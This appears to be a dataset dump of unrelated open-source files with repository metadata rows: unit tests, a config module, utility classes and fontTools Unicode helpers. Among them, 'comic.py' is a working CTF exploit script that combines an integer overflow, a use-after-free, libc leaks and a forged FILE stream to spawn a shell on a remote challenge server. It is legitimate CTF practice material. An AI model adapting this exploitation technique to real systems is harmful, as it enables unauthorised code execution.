self.assertEqual(x, self._get_x(3))
assert x_mapped is not None
x_expected = SimpleNamespace(
num=3, num_squared=9, double_num_squared=18, text="Henry has fun"
)
self.assertEqual(x_mapped, x_expected)
mapper_pre_2 = MapperWithPre2("pre_mapper", pre=[mapper_pre])
x = self._get_x(3)
x_mapped = mapper_pre_2(x)
self.assertEqual(x, self._get_x(3))
assert x_mapped is not None
x_expected = SimpleNamespace(
num=3,
num_squared=9,
double_num_squared=18,
double_num_squared_plus_1=19,
text="Henry has fun",
)
self.assertEqual(x_mapped, x_expected)
def test_mapper_pre_decorator(self) -> None:
@lambda_mapper()
def mapper_no_pre(x: DataPoint) -> DataPoint:
x.double_num_squared = 2 * x.num_squared
return x
x = self._get_x(3)
with self.assertRaises(AttributeError):
x_mapped = mapper_no_pre(x)
@lambda_mapper(pre=[square])
def mapper_pre(x: DataPoint) -> DataPoint:
x.double_num_squared = 2 * x.num_squared
return x
x = self._get_x(3)
x_mapped = mapper_pre(x)
self.assertEqual(x, self._get_x(3))
assert x_mapped is not None
x_expected = SimpleNamespace(
num=3, num_squared=9, double_num_squared=18, text="Henry has fun"
)
self.assertEqual(x_mapped, x_expected)
@lambda_mapper(pre=[mapper_pre])
def mapper_pre_2(x: DataPoint) -> DataPoint:
x.double_num_squared_plus_1 = x.double_num_squared + 1
return x
x = self._get_x(3)
x_mapped = mapper_pre_2(x)
self.assertEqual(x, self._get_x(3))
assert x_mapped is not None
x_expected = SimpleNamespace(
num=3,
num_squared=9,
double_num_squared=18,
double_num_squared_plus_1=19,
text="Henry has fun",
)
self.assertEqual(x_mapped, x_expected)
def test_decorator_mapper_memoized(self) -> None:
square_hit_tracker = SquareHitTracker()
@lambda_mapper(memoize=True)
def square(x: DataPoint) -> DataPoint:
x.num_squared = square_hit_tracker(x.num)
return x
x8 = self._get_x()
x9 = self._get_x(9)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 1)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 1)
x9_mapped = square(x9)
assert x9_mapped is not None
self.assertEqual(x9_mapped.num_squared, 81)
self.assertEqual(square_hit_tracker.n_hits, 2)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 2)
square.reset_cache()
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 3)
def test_decorator_mapper_memoized_none(self) -> None:
square_hit_tracker = SquareHitTracker()
@lambda_mapper(memoize=True)
def square(x: DataPoint) -> DataPoint:
x.num_squared = square_hit_tracker(x.num)
if x.num == 21:
return None
return x
x21 = self._get_x(21)
x21_mapped = square(x21)
self.assertIsNone(x21_mapped)
self.assertEqual(square_hit_tracker.n_hits, 1)
x21_mapped = square(x21)
self.assertIsNone(x21_mapped)
self.assertEqual(square_hit_tracker.n_hits, 1)
def test_decorator_mapper_not_memoized(self) -> None:
square_hit_tracker = SquareHitTracker()
@lambda_mapper(memoize=False)
def square(x: DataPoint) -> DataPoint:
x.num_squared = square_hit_tracker(x.num)
return x
x8 = self._get_x()
x9 = self._get_x(9)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 1)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 2)
x19_mapped = square(x9)
assert x19_mapped is not None
self.assertEqual(x19_mapped.num_squared, 81)
self.assertEqual(square_hit_tracker.n_hits, 3)
x8_mapped = square(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.num_squared, 64)
self.assertEqual(square_hit_tracker.n_hits, 4)
def test_mapper_pre_memoized(self) -> None:
square_hit_tracker = SquareHitTracker()
@lambda_mapper(memoize=False)
def square(x: DataPoint) -> DataPoint:
x.num_squared = square_hit_tracker(x.num)
return x
@lambda_mapper(pre=[square], memoize=True)
def mapper_pre(x: DataPoint) -> DataPoint:
x.double_num_squared = 2 * x.num_squared
return x
x8 = self._get_x()
x9 = self._get_x(9)
x8_mapped = mapper_pre(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.double_num_squared, 128)
self.assertEqual(square_hit_tracker.n_hits, 1)
x8_mapped = mapper_pre(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.double_num_squared, 128)
self.assertEqual(square_hit_tracker.n_hits, 1)
x9_mapped = mapper_pre(x9)
assert x9_mapped is not None
self.assertEqual(x9_mapped.double_num_squared, 162)
self.assertEqual(square_hit_tracker.n_hits, 2)
x8_mapped = mapper_pre(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.double_num_squared, 128)
self.assertEqual(square_hit_tracker.n_hits, 2)
mapper_pre.reset_cache()
x8_mapped = mapper_pre(x8)
assert x8_mapped is not None
self.assertEqual(x8_mapped.double_num_squared, 128)
self.assertEqual(square_hit_tracker.n_hits, 3)
def test_mapper_decorator_no_parens(self) -> None:
with self.assertRaisesRegex(ValueError, "missing parentheses"):
@lambda_mapper
def square(x: DataPoint) -> DataPoint:
x.num_squared = x.num ** 2
return x
def test_mapper_with_args_kwargs(self) -> None:
with self.assertRaises(ValueError):
MapperWithArgs("my_mapper")
with self.assertRaises(ValueError):
MapperWithKwargs("my_mapper")
class TestGetHashable(unittest.TestCase):
def test_get_hashable_hashable(self) -> None:
x = (8, "abc")
x_hashable = get_hashable(x)
self.assertEqual(x, x_hashable)
def test_get_hashable_dict(self) -> None:
d = dict(a=8, b=dict(c=9, d="foo"))
d_hashable = get_hashable(d)
d_sub_expected = frozenset((("c", 9), ("d", "foo")))
d_expected = frozenset((("a", 8), ("b", d_sub_expected)))
self.assertEqual(d_hashable, d_expected)
self.assertEqual(hash(d_hashable), hash(d_expected))
def test_get_hashable_list(self) -> None:
c = [8, dict(c=9, d="foo")]
c_hashable = get_hashable(c)
c_expected = (8, frozenset((("c", 9), ("d", "foo"))))
self.assertEqual(c_hashable, c_expected)
self.assertEqual(hash(c_hashable), hash(c_expected))
def test_get_hashable_series(self) -> None:
s = pd.Series(dict(a=8, b=dict(c=9, d="foo")), name="bar")
s_hashable = get_hashable(s)
s_sub_expected = frozenset((("c", 9), ("d", "foo")))
s_expected = frozenset((("a", 8), ("b", s_sub_expected)))
self.assertEqual(s_hashable, s_expected)
self.assertEqual(hash(s_hashable), hash(s_expected))
def test_get_hashable_series_with_doc(self) -> None:
nlp = spacy.load("en_core_web_sm")
doc = nlp("Foo went to the bar.")
s = pd.Series(dict(a=8, b=doc), name="baz")
s_hashable = get_hashable(s)
s_expected = frozenset((("a", 8), ("b", doc)))
self.assertEqual(s_hashable, s_expected)
self.assertEqual(hash(s_hashable), hash(s_expected))
def test_get_hashable_ndarray(self) -> None:
v = np.array([[3, 6, 9], [0.4, 0.8, 0.12]])
x = (8, dict(a=v))
x_hashable = get_hashable(x)
x_expected = (8, frozenset((("a", v.data.tobytes()),)))
self.assertEqual(x_hashable, x_expected)
def test_get_hashable_unhashable(self) -> None:
v = pd.DataFrame(dict(a=[4, 5], b=[1, 2]))
x = (8, dict(a=v))
with self.assertRaises(ValueError):
get_hashable(x)
| 34.70529 | 83 | 0.628683 |
794626c346290f14e92abde38acd065c4352bd89 | 1,822 | py | Python | numba_dppy/config.py | fossabot/numba-dppy | 918922d94c64572c279679b893445bf84f817187 | [
"Apache-2.0"
] | null | null | null | numba_dppy/config.py | fossabot/numba-dppy | 918922d94c64572c279679b893445bf84f817187 | [
"Apache-2.0"
] | 1 | 2021-05-08T09:23:15.000Z | 2021-05-08T09:23:15.000Z | numba_dppy/config.py | fossabot/numba-dppy | 918922d94c64572c279679b893445bf84f817187 | [
"Apache-2.0"
] | 1 | 2021-05-09T13:51:03.000Z | 2021-05-09T13:51:03.000Z | # Copyright 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
try:
import dpctl
dppy_present = False
try:
# For the extension to work we should have at least one
# non-host SYCL device.
dppy_present = not dpctl.select_default_device().is_host
except ValueError:
dppy_present = False
except:
dppy_present = False
def _readenv(name, ctor, default):
"""Original version from numba\core\config.py
class _EnvReloader():
...
def process_environ():
def _readenv(): ...
"""
value = os.environ.get(name)
if value is None:
return default() if callable(default) else default
try:
return ctor(value)
except Exception:
import warnings
warnings.warn(
"environ %s defined but failed to parse '%s'" % (name, value),
RuntimeWarning,
)
return default
# Save intermediate files being generated by DPPY
SAVE_IR_FILES = _readenv("NUMBA_DPPY_SAVE_IR_FILES", int, 0)
# Turn SPIRV-VALIDATION ON/OFF switch
SPIRV_VAL = _readenv("NUMBA_DPPY_SPIRV_VAL", int, 0)
# Dump offload diagnostics
OFFLOAD_DIAGNOSTICS = _readenv("NUMBA_DPPY_OFFLOAD_DIAGNOSTICS", int, 0)
FALLBACK_ON_CPU = _readenv("NUMBA_DPPY_FALLBACK_ON_CPU", int, 1)
| 28.46875 | 74 | 0.69045 |
7946284304115c48bcd1e8ccf24051890b5eb702 | 1,423 | py | Python | ICPC_Mirrors/Nitc_9.0/nwerc2019all/jackdawsandcrows/submissions/accepted/per_faster_sort.py | Shahraaz/CP_P_S5 | b068ad02d34338337e549d92a14e3b3d9e8df712 | [
"MIT"
] | null | null | null | ICPC_Mirrors/Nitc_9.0/nwerc2019all/jackdawsandcrows/submissions/accepted/per_faster_sort.py | Shahraaz/CP_P_S5 | b068ad02d34338337e549d92a14e3b3d9e8df712 | [
"MIT"
] | null | null | null | ICPC_Mirrors/Nitc_9.0/nwerc2019all/jackdawsandcrows/submissions/accepted/per_faster_sort.py | Shahraaz/CP_P_S5 | b068ad02d34338337e549d92a14e3b3d9e8df712 | [
"MIT"
] | null | null | null | def cost(v1, v2, sgn=1):
return v1 is not None and v2 is not None and sgn*v1*v2 >= 0
class Elem:
def __init__(self, v, p):
self.v = v
self.f = 1
self.prev = p
if p: p.next = self
self.next = None
def rm(self):
if self.prev: self.prev.next = self.next
if self.next: self.next.prev = self.prev
def midc(self):
return self.next is not None and self.prev is not None and cost(self.prev.v, self.next.v, 1-2*(self.f % 2))
def merge(self, node):
if node is None: return 0
if node.v is None:
self.f += node.f
node.rm()
return node.midc()
return cost(self.v, node.v)
def fuzzy(self):
delta = self.merge(self.prev) + self.merge(self.next) - self.midc()
self.v = None
return delta
def solve():
(n, x, y) = map(int, raw_input().split())
A = map(int, raw_input().split())
V = [Elem(A[0], None)]
p = A[0]
dels = A[0] == 0
for i in range(1, n):
dels += p*A[i] > 0 or not A[i]
if A[i]: p = A[i]
V.append(Elem(A[i], V[-1]))
ans = y*dels
dels = sum(A[i]*A[i+1] >= 0 for i in range(n-1))
events = [abs(A[i])*n+i for i in range(n)]
events.sort()
for e in events:
c = e/n
v = V[e%n]
dels -= v.fuzzy()
ans = min(ans, (c+1)*x + y*dels)
return ans
print solve()
| 27.365385 | 115 | 0.504568 |
7946288c7e8323a08d8ca1dc213a8e53d3aabbb0 | 3,981 | py | Python | 2018 AceBear CTF/Comic Store/comic.py | mathboy7/CTF | e279bf91ad6b22fc41087571c5fba9501832ab80 | [
"Apache-2.0"
] | 46 | 2017-11-07T05:30:26.000Z | 2021-11-24T09:33:41.000Z | 2018 AceBear CTF/Comic Store/comic.py | mathboy7/CTF | e279bf91ad6b22fc41087571c5fba9501832ab80 | [
"Apache-2.0"
] | null | null | null | 2018 AceBear CTF/Comic Store/comic.py | mathboy7/CTF | e279bf91ad6b22fc41087571c5fba9501832ab80 | [
"Apache-2.0"
] | 3 | 2017-11-14T14:45:28.000Z | 2020-08-30T07:59:04.000Z | from pwn import *
#env = {"LD_PRELOAD":"./comic.so.6"}
#r = process("./comic_store", env=env)
r = remote("comicstore.acebear.site", 3005)
def register(name):
r.sendline("1")
print r.recvuntil("name: ")
r.send(name)
print r.recvuntil("choice: ")
def addComic(name, quantity):
r.sendline("3")
print r.recvuntil("comic: ")
r.sendline(name)
print r.recvuntil("Quantity: ")
r.sendline(str(quantity))
print r.recvuntil("choice: ")
def rename(name):
r.sendline("4")
print r.recvuntil("choice: ")
r.sendline("2")
print r.recvuntil("name: ")
r.send(name)
print r.recvuntil("choice: ")
r.sendline("4")
print r.recvuntil("choice: ")
def feedback(sbig, feedback):
r.sendline("4")
print r.recvuntil("choice: ")
r.sendline("3")
print r.recvuntil("choice: ")
r.sendline(str(sbig))
print r.recvuntil(": ")
r.send(feedback)
r.sendline("4")
print r.recvuntil("choice: ")
def takeComicOut(comic, quantity):
r.sendline("5")
print r.recvuntil("choice: ")
r.sendline("2")
print r.recvuntil("comic: ")
r.sendline(comic)
print r.recvuntil("Quantity: ")
r.sendline(str(quantity))
print r.recvuntil("choice: ")
r.sendline("3")
print r.recvuntil("choice: ")
print r.recvuntil("choice: ")
#gdb.attach(r, "")
register("A"*0xa0)
for i in range(7):
addComic("Conan", 138548) # using integer overflow
takeComicOut("Conan", 138500)
r.sendline("6")
print r.recvuntil("no) ")
r.sendline("1") # I'm rich now!
print r.recvuntil("choice: ")
addComic("Conan", 1)
addComic("Dragon Ball", 1)
addComic("Doraemon", 1)
for i in range(6):
addComic("Doraemon", 165192)
addComic("Doraemon", 8847)
r.sendline("6")
print r.recvuntil("no) ")
r.sendline("1") # Trigger UAF
addComic("Naruto", 1)
r.sendline("5")
print r.recvuntil("choice: ")
r.sendline("1")
print r.recvuntil("30000 VND")
print r.recvuntil("* ")
rv = r.recv(6)
heap = u64(rv + "\x00\x00")
heap_base = heap - 0xd0
print r.recvuntil("choice: ")
r.sendline("3")
print r.recvuntil("choice: ")
print "heap: " + hex(heap_base)
rename("A"*0xe8 + p64(heap_base+0x310))
feedback(1, p64(heap_base+0x508)+"\x00"*16)
##### leak libc #####
r.sendline("5")
print r.recvuntil("choice: ")
r.sendline("1")
print r.recvuntil("30000 VND")
print r.recvuntil("* ")
rv = r.recv(6)
libc = u64(rv + "\x00\x00")
#libc_base = libc - 0x3c1bf8
libc_base = libc - 0x3c4c18
gets = libc_base + 0x6ed80
system = libc_base + 0x45390
print r.recvuntil("choice: ")
r.sendline("3")
print r.recvuntil("choice: ")
print "libc: " + hex(libc)
addComic("Death Note", 1)
addComic("Conan", 138547)
addComic("Conan", 30116)
r.sendline("6")
print r.recvuntil("no) ")
r.sendline("1") # Trigger UAF
########################################
vtbl = p64(gets)*17
vtbl += p64(heap_base+0x530)
#vtbl += p64(0x0)
#vtbl += p64(0x21)
#vtbl += p64(heap_base+0x520) # name
#vtbl += p64(0)*2 # price, quantity
#vtbl += p64(0) # align
#vtbl += p64(0x0)
#vtbl += p64(0x21)
feedback(2, vtbl) # fake vtable
feedback(1, p64(heap_base+0x70) + p64(libc_base+0x3c56f8-0x10) + p64(heap_base + 0x520)) # UAF
addComic("One Piece", 1)
addComic("Inuyasha", 1)
r.sendline("6")
file_stream = "\x87\x20\xad\xfb\x3b\x73\x68\x00"
file_stream += p64(libc_base + 0x3c56a3)*7
file_stream += p64(libc_base + 0x3c56a4)
file_stream += "\x00"*32
file_stream += p64(libc_base + 0x3c48e0)
file_stream += p64(0x1)
file_stream += p64(0xffffffffffffffff)
file_stream += p64(0x0)
file_stream += p64(libc_base + 0x3c6780)
file_stream += p64(0xffffffffffffffff)
file_stream += "\x00"*8
file_stream += p64(libc_base + 0x3c47a0)
file_stream += "\x00"*24
file_stream += p64(0xffffffff)
file_stream += "\x00"*16
file_stream += p64(libc_base + 0x3c5700)
file_stream += p64(libc_base + 0x3c5540)
file_stream += p64(libc_base + 0x3c5620)
file_stream += p64(libc_base + 0x3c48e0)
file_stream += p64(libc_base + 0x20b70)
file_stream += p64(system)*15
r.sendline(file_stream)
r.interactive()
# AceBear{pl3ase_read_comic_wh3n_u_h4ve_fr33_tim3} | 21.994475 | 94 | 0.666918 |
794628ea9c4ce8f60dfa5cff3b9ea628f016bb0a | 808 | py | Python | 02-Classes-and-Instances/exer-04-employee.py | Beshkov/OOP | 297edadb3e7801dfeee5752a20aae6aead8da610 | [
"MIT"
] | 1 | 2021-05-24T17:51:53.000Z | 2021-05-24T17:51:53.000Z | 02-Classes-and-Instances/exer-04-employee.py | Beshkov/Python_OOP | 297edadb3e7801dfeee5752a20aae6aead8da610 | [
"MIT"
] | null | null | null | 02-Classes-and-Instances/exer-04-employee.py | Beshkov/Python_OOP | 297edadb3e7801dfeee5752a20aae6aead8da610 | [
"MIT"
] | null | null | null | class Employee:
def __init__(self, id, first_name, last_name, salary):
self.id = id
self.first_name = first_name
self.last_name = last_name
self.salary = salary
def get_full_name(self):
return f"{self.first_name} {self.last_name}"
def get_annual_salary(self):
return self.salary * 12
def raise_salary(self, amount):
# self note: the amount should be checked you can't raise salary with negative number, so my refactoring:
if amount <= 0:
return f"You cant raise salary by negative amount: {amount}"
self.salary += amount
return self.salary
employee = Employee(744423129, "John", "Smith", 1000)
print(employee.get_full_name())
print(employee.raise_salary(500))
print(employee.get_annual_salary())
| 32.32 | 113 | 0.667079 |
79462ac6da8cdecfa144c76ac63ad5d9c2a0c092 | 1,198 | py | Python | data/spider/quantaxisSpider/quantaxisSpider/spiders/mongodbQuery.py | QUANTAXIS/quant | d3b76799b20cac7a876fbdeb6f97c48295dde06f | [
"MIT"
] | null | null | null | data/spider/quantaxisSpider/quantaxisSpider/spiders/mongodbQuery.py | QUANTAXIS/quant | d3b76799b20cac7a876fbdeb6f97c48295dde06f | [
"MIT"
] | null | null | null | data/spider/quantaxisSpider/quantaxisSpider/spiders/mongodbQuery.py | QUANTAXIS/quant | d3b76799b20cac7a876fbdeb6f97c48295dde06f | [
"MIT"
] | 1 | 2021-04-10T07:10:42.000Z | 2021-04-10T07:10:42.000Z | import pymongo
import json
class querylist(object):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['quantaxis_Spider']
def queryMongodbSame(self,collname,keyname,keycontent):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['quantaxis_Spider']
coll = db[collname]
count = coll.find({keyname:keycontent}).count()
return count
def checkDifferentDatabase(self,col1,col2,keyname1,keyname2,x):
client = pymongo.MongoClient(host="127.0.0.1", port=27017)
db = client['quantaxis_Spider']
coll1 = db[col1]
coll2 = db[col2]
countnum=0
for url in coll1.find():
urlx=url[keyname1]
print (col2)
print (keyname1)
print (urlx)
count = self.queryMongodbSame(col2,keyname2,urlx)
print (count)
if count == x:
print ('none in the db2')
print (countnum)
else:
print ('already in')
continue
countnum+=1
print (countnum)
print (countnum)
| 28.52381 | 67 | 0.542571 |
79462c76db735efcac8fc61d333893d5300569da | 7,964 | py | Python | Lib/fontTools/unicodedata/__init__.py | twardoch/fonttools-py27 | 75b852d3f59fc0d03c6e78581530597d4c6368a1 | [
"MIT",
"BSD-3-Clause"
] | 240 | 2021-01-11T14:49:24.000Z | 2022-03-29T22:33:49.000Z | Lib/fontTools/unicodedata/__init__.py | twardoch/fonttools-py27 | 75b852d3f59fc0d03c6e78581530597d4c6368a1 | [
"MIT",
"BSD-3-Clause"
] | 77 | 2021-01-12T20:23:30.000Z | 2022-03-28T12:14:34.000Z | Lib/fontTools/unicodedata/__init__.py | twardoch/fonttools-py27 | 75b852d3f59fc0d03c6e78581530597d4c6368a1 | [
"MIT",
"BSD-3-Clause"
] | 28 | 2021-01-17T05:44:11.000Z | 2022-01-11T19:58:46.000Z | from __future__ import (
print_function, division, absolute_import, unicode_literals)
from fontTools.misc.py23 import *
import re
from bisect import bisect_right
try:
# use unicodedata backport compatible with python2:
# https://github.com/mikekap/unicodedata2
from unicodedata2 import *
except ImportError: # pragma: no cover
# fall back to built-in unicodedata (possibly outdated)
from unicodedata import *
from . import Blocks, Scripts, ScriptExtensions, OTTags
__all__ = [tostr(s) for s in (
# names from built-in unicodedata module
"lookup",
"name",
"decimal",
"digit",
"numeric",
"category",
"bidirectional",
"combining",
"east_asian_width",
"mirrored",
"decomposition",
"normalize",
"unidata_version",
"ucd_3_2_0",
# additonal functions
"block",
"script",
"script_extension",
"script_name",
"script_code",
"script_horizontal_direction",
"ot_tags_from_script",
"ot_tag_to_script",
)]
def script(char):
""" Return the four-letter script code assigned to the Unicode character
'char' as string.
>>> script("a")
'Latn'
>>> script(",")
'Zyyy'
>>> script(unichr(0x10FFFF))
'Zzzz'
"""
code = byteord(char)
# 'bisect_right(a, x, lo=0, hi=len(a))' returns an insertion point which
# comes after (to the right of) any existing entries of x in a, and it
# partitions array a into two halves so that, for the left side
# all(val <= x for val in a[lo:i]), and for the right side
# all(val > x for val in a[i:hi]).
# Our 'SCRIPT_RANGES' is a sorted list of ranges (only their starting
# breakpoints); we want to use `bisect_right` to look up the range that
# contains the given codepoint: i.e. whose start is less than or equal
# to the codepoint. Thus, we subtract -1 from the index returned.
i = bisect_right(Scripts.RANGES, code)
return Scripts.VALUES[i-1]
def script_extension(char):
""" Return the script extension property assigned to the Unicode character
'char' as a set of string.
>>> script_extension("a") == {'Latn'}
True
>>> script_extension(unichr(0x060C)) == {'Arab', 'Rohg', 'Syrc', 'Thaa'}
True
>>> script_extension(unichr(0x10FFFF)) == {'Zzzz'}
True
"""
code = byteord(char)
i = bisect_right(ScriptExtensions.RANGES, code)
value = ScriptExtensions.VALUES[i-1]
if value is None:
# code points not explicitly listed for Script Extensions
# have as their value the corresponding Script property value
return {script(char)}
return value
def script_name(code, default=KeyError):
""" Return the long, human-readable script name given a four-letter
Unicode script code.
If no matching name is found, a KeyError is raised by default.
You can use the 'default' argument to return a fallback value (e.g.
'Unknown' or None) instead of throwing an error.
"""
try:
return str(Scripts.NAMES[code].replace("_", " "))
except KeyError:
if isinstance(default, type) and issubclass(default, KeyError):
raise
return default
_normalize_re = re.compile(r"[-_ ]+")
def _normalize_property_name(string):
"""Remove case, strip space, '-' and '_' for loose matching."""
return _normalize_re.sub("", string).lower()
_SCRIPT_CODES = {_normalize_property_name(v): k
for k, v in Scripts.NAMES.items()}
def script_code(script_name, default=KeyError):
"""Returns the four-letter Unicode script code from its long name
If no matching script code is found, a KeyError is raised by default.
You can use the 'default' argument to return a fallback string (e.g.
'Zzzz' or None) instead of throwing an error.
"""
normalized_name = _normalize_property_name(script_name)
try:
return _SCRIPT_CODES[normalized_name]
except KeyError:
if isinstance(default, type) and issubclass(default, KeyError):
raise
return default
# The data on script direction is taken from harfbuzz's "hb-common.cc":
# https://goo.gl/X5FDXC
# It matches the CLDR "scriptMetadata.txt as of January 2018:
# http://unicode.org/repos/cldr/trunk/common/properties/scriptMetadata.txt
RTL_SCRIPTS = {
# Unicode-1.1 additions
'Arab', # Arabic
'Hebr', # Hebrew
# Unicode-3.0 additions
'Syrc', # Syriac
'Thaa', # Thaana
# Unicode-4.0 additions
'Cprt', # Cypriot
# Unicode-4.1 additions
'Khar', # Kharoshthi
# Unicode-5.0 additions
'Phnx', # Phoenician
'Nkoo', # Nko
# Unicode-5.1 additions
'Lydi', # Lydian
# Unicode-5.2 additions
'Avst', # Avestan
'Armi', # Imperial Aramaic
'Phli', # Inscriptional Pahlavi
'Prti', # Inscriptional Parthian
'Sarb', # Old South Arabian
'Orkh', # Old Turkic
'Samr', # Samaritan
# Unicode-6.0 additions
'Mand', # Mandaic
# Unicode-6.1 additions
'Merc', # Meroitic Cursive
'Mero', # Meroitic Hieroglyphs
# Unicode-7.0 additions
'Mani', # Manichaean
'Mend', # Mende Kikakui
'Nbat', # Nabataean
'Narb', # Old North Arabian
'Palm', # Palmyrene
'Phlp', # Psalter Pahlavi
# Unicode-8.0 additions
'Hatr', # Hatran
'Hung', # Old Hungarian
# Unicode-9.0 additions
'Adlm', # Adlam
}
def script_horizontal_direction(script_code, default=KeyError):
""" Return "RTL" for scripts that contain right-to-left characters
according to the Bidi_Class property. Otherwise return "LTR".
"""
if script_code not in Scripts.NAMES:
if isinstance(default, type) and issubclass(default, KeyError):
raise default(script_code)
return default
return str("RTL") if script_code in RTL_SCRIPTS else str("LTR")
def block(char):
""" Return the block property assigned to the Unicode character 'char'
as a string.
>>> block("a")
'Basic Latin'
>>> block(unichr(0x060C))
'Arabic'
>>> block(unichr(0xEFFFF))
'No_Block'
"""
code = byteord(char)
i = bisect_right(Blocks.RANGES, code)
return Blocks.VALUES[i-1]
def ot_tags_from_script(script_code):
""" Return a list of OpenType script tags associated with a given
Unicode script code.
Return ['DFLT'] script tag for invalid/unknown script codes.
"""
if script_code not in Scripts.NAMES:
return [OTTags.DEFAULT_SCRIPT]
script_tags = [
OTTags.SCRIPT_EXCEPTIONS.get(
script_code,
script_code[0].lower() + script_code[1:]
)
]
if script_code in OTTags.NEW_SCRIPT_TAGS:
script_tags.extend(OTTags.NEW_SCRIPT_TAGS[script_code])
script_tags.reverse() # last in, first out
return script_tags
def ot_tag_to_script(tag):
""" Return the Unicode script code for the given OpenType script tag, or
None for "DFLT" tag or if there is no Unicode script associated with it.
Raises ValueError if the tag is invalid.
"""
tag = tostr(tag).strip()
if not tag or " " in tag or len(tag) > 4:
raise ValueError("invalid OpenType tag: %r" % tag)
while len(tag) != 4:
tag += str(" ") # pad with spaces
if tag == OTTags.DEFAULT_SCRIPT:
# it's unclear which Unicode script the "DFLT" OpenType tag maps to,
# so here we return None
return None
if tag in OTTags.NEW_SCRIPT_TAGS_REVERSED:
return OTTags.NEW_SCRIPT_TAGS_REVERSED[tag]
# This side of the conversion is fully algorithmic
# Any spaces at the end of the tag are replaced by repeating the last
# letter. Eg 'nko ' -> 'Nkoo'.
# Change first char to uppercase
script_code = tag[0].upper() + tag[1]
for i in range(2, 4):
script_code += (script_code[i-1] if tag[i] == " " else tag[i])
if script_code not in Scripts.NAMES:
return None
return script_code
| 28.750903 | 78 | 0.648041 |
79462cf2f424a456a301657f3234b0e58e079a84 | 618 | py | Python | python_solutions/Two Strings.py | ersincebi/hackerrank | 9475c8e88e9071544c10a939fe7307c8e62fe3a0 | [
"MIT"
] | null | null | null | python_solutions/Two Strings.py | ersincebi/hackerrank | 9475c8e88e9071544c10a939fe7307c8e62fe3a0 | [
"MIT"
] | null | null | null | python_solutions/Two Strings.py | ersincebi/hackerrank | 9475c8e88e9071544c10a939fe7307c8e62fe3a0 | [
"MIT"
] | null | null | null | #!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'twoStrings' function below.
#
# The function is expected to return a STRING.
# The function accepts following parameters:
# 1. STRING s1
# 2. STRING s2
#
def twoStrings(s1, s2):
return 'Yes' if set(s1) & set(s2) else 'No'
if __name__ == '__main__':
# fptr = open(os.environ['OUTPUT_PATH'], 'w')
# q = int(input().strip())
# for q_itr in range(q):
# s1 = input()
# s2 = input()
# result =
print(twoStrings('hello', 'world'))
print(twoStrings('hi', 'world'))
# fptr.write(result + '\n')
# fptr.close()
| 15.846154 | 46 | 0.639159 |
79462cfdc3a54276b5de5147caf153c958ad4c23 | 2,098 | py | Python | Ago-Dic-2020/Practicas/1er-Parcial/Práctica 5/strategy_test.py | Andremm303/DAS_Sistemas | 0163505737e2b24365ea8b4e8135773a6801add4 | [
"MIT"
] | null | null | null | Ago-Dic-2020/Practicas/1er-Parcial/Práctica 5/strategy_test.py | Andremm303/DAS_Sistemas | 0163505737e2b24365ea8b4e8135773a6801add4 | [
"MIT"
] | null | null | null | Ago-Dic-2020/Practicas/1er-Parcial/Práctica 5/strategy_test.py | Andremm303/DAS_Sistemas | 0163505737e2b24365ea8b4e8135773a6801add4 | [
"MIT"
] | null | null | null | import unittest
from strategy import *
class StrategyTest(unittest.TestCase):
def test_basic_auth_strategy(self):
context = AuthContext(BasicAuthConcreteStrategy(usr='tintin', passwd='123456'))
self.assertEqual(
context.authenticate(),
'### Authenticated with Basic Auth\n\tUser: tintin\n\tPass: 123456'
)
def test_oauth_strategy(self):
cred = {
"access_token": "una cadena muy larga",
"token_type": "Bearer",
"expires_in": 3600,
"refresh_token": "una cadena muy larga 2",
"scope": "readAndWrite"
}
context = AuthContext(OauthAuthConcreteStrategy(credentials=cred))
self.assertEqual(
context.authenticate(),
'### Authenticated with OAuth\n\tCredentials: {"access_token":"una cadena muy larga","token_type":"Bearer","expires_in":3600,"refresh_token":"una cadena muy larga 2","scope":"readAndWrite"}'
)
def test_api_key_strategy(self):
context = AuthContext(ApiKeyConcreteStrategy(api_key='tintin-123456'))
self.assertEqual(
context.authenticate(),
'### Authenticated with API Key\n\tKey: tintin-123456'
)
def test_default_strategy(self):
self.assertEqual(
AuthContext().authenticate(),
'### Authenticated with OAuth\n\tCredentials: {"access_token":"una cadena muy larga","token_type":"Bearer","expires_in":3600,"refresh_token":"una cadena muy larga 2","scope":"default"}'
)
def test_updating_strategy(self):
context = AuthContext(BasicAuthConcreteStrategy(usr='tintin', passwd='123456'))
self.assertEqual(
context.authenticate(),
'### Authenticated with Basic Auth\n\tUser: tintin\n\tPass: 123456'
)
context.set_strategy(ApiKeyConcreteStrategy(api_key='tintin-123456'))
self.assertEqual(
context.authenticate(),
'### Authenticated with API Key\n\tKey: tintin-123456'
)
if __name__ == "__main__":
unittest.main()
| 38.851852 | 202 | 0.629171 |
79462eac4ecd7abea170b7cf91e6544702553490 | 1,576 | py | Python | MachineLearning/Bayes/bayes_classifier.py | QAlexBall/Learning_Py | 8a5987946928a9d86f6807555ed435ac604b2c44 | [
"MIT"
